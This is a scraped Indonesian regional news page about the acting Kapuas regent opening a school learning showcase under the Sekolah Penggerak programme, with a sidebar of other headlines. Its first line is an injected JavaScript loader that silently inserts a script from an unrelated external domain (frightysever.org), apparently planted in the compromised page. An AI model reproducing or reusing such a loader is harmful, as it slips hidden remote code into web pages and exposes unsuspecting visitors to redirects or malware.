(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Panen Hasil Belajar Program Sekolah Penggerak Kurikulum Merdeka Belajar, Ini Kata Pj Bupati Kapuas


KANALKALIMANTAN.COM, KUALA KAPUAS – Penjabat (Pj) Bupati Kapuas Erlin Hardi membuka kegiatan panen hasil belajar SDN 2 Selat Utara dan SDN 1 Palangkai implementasi kurikulum merdeka program sekolah penggerak angkatan 2 Kabupaten Kapuas, di halaman SDN 2 Selat Utara, Jumat (16/2/2024) pagi.

Tema panen hasil belajar tersebut “Mari bersama – sama bergerak dan menggerakkan wujudkan pendidikan karakter dalam transformasi pendidikan masa kini”.

Pj Bupati Kapuas mengatakan merdeka belajar adalah program kebijakan dari Kementerian Pendidikan dan Kebudayaan Republik Indonesia yang dicanangkan oleh Menteri Pendidikan dan Kebudayan RI Kabinet Indonesia Maju Nadiem Makarim.

Baca juga: Ricuh Sesama Petugas TPS di Banjarmasin, Anggota KPPS Serang Ketuanya Pakai Parang

Pj Bupati Kapuas Erlin Hardi membuka kegiatan panen hasil belajar SDN 2 Selat Utara dan SDN 1 Palangkai program merdeka belajar, Jum’at (16/2/2024). Foto: ags

“Program sekolah penggerak merupakan katalis untuk mewujudkan visi reformasi pendidikan indonesia yang berfokus pada pengembangan hasil belajar siswa secara holistik melalui enam profil pelajar pancasila, yang dirancangkan sebagai upaya untuk mewujudkan Indonesia maju yang berdaulat, mandiri dan berkepribadian,” ucap Erlin.

Dirinya juga mengatakan program sekolah penggerak terfokus pada pengembangan SDM sekolah, mulai dari siswa, guru sampai dengan kepala sekolah dan juga kualitas siswa diukur melalui pencapain hasil belajar diatas level yang diharapkan dengan menciptakan lingkungan belajar yang aman, nyaman, inklusif, dan menyenangkan. Sehingga terjadi perbaikan pada pembelajaran yang berpusat pada murid dan refleksi diri sera pengimbasan.

“Program sekolah penggerak adalah program untuk meningkatkan kualitas belajar siswa yang terdiri dari lima jenis intervensi untuk mengakselerasi sekolah bergerak 1 sampai dua tahap lebih maju dalam kurun waktu tiga tahun ajaran,” kata Pj Bupati Kapuas.

Baca juga: Bappedalitbang Banjar Gelar Sosialisasi Tahapan Perencanaan E-walidata SIPD RI

Lebih lanjut dijelaskan Pj Bupati Erlin Hardi, panen hasil belajar adalah inovasi dan kreativitas sekolah penggerak yang telah dilaksanakan dan dikembangkan di sekolah dan nantinya harus melakukan inovasi-inovasi baru lainnya.

“Panen hasil belajar merupakan kegiatan menuai hasil dari apa yang ditanam dan dirawat sehingga dapat berguna bukan hanya bagi diri sendiri, tetap juga berguna bagi orang lain,” tutur Erlin Hardi.

Tidak lupa dirinya pun mengapresiasi kegiatan panen hasil belajar tersebut dan juga mengatakan bahwa pemerintah daerah pasti mendukung program sekolah penggerak dan pengimbasannya yang sudah berjalan di Kabupaten Kapuas.

“Saya berharap kegiatan ini berlanjut di masa-masa yang akan datang, sehingga akan memunculkan ide-ide baru, kreatifitas dan inovasi pembelajaran yang lebih baik,” pungkas Erlin Hardi.

Baca juga: Perpustakaan di Daerah Dituntut Inovatif, Perbanyak Kunjungan Mobil Keliling ke Pelosok

Sementara Kepala Dinas Pendidikan Kapuas Aswan mengatakan sangat mengapresiasi adanya panen hasil belajar SDN 2 Selat Utara dan SDN 1 Palangkai.

“Semoga kegiatan ini dapat bermanfaat untuk dunia pendidikan kita dikabupaten Kapuas, kita dukung untuk terus berkarya dan berinovasi,” kata Aswan.

Turut hadir mendampingi Pj Ketua TP PKK Kabupaten Kapuas Agustina Erlin Hardi, Kepala Dinas Pendidikan Aswan, Kepala Dinas Pertanian Yaya dan Lurah Selat Utara Rahmat M Noor. (Kanalkalimantan.com/ags)

Reporter : ags
Editor : kk


Muhammad Andi

Recent Posts

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

2 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

12 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

13 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

13 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

14 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

15 jam ago

This website uses cookies.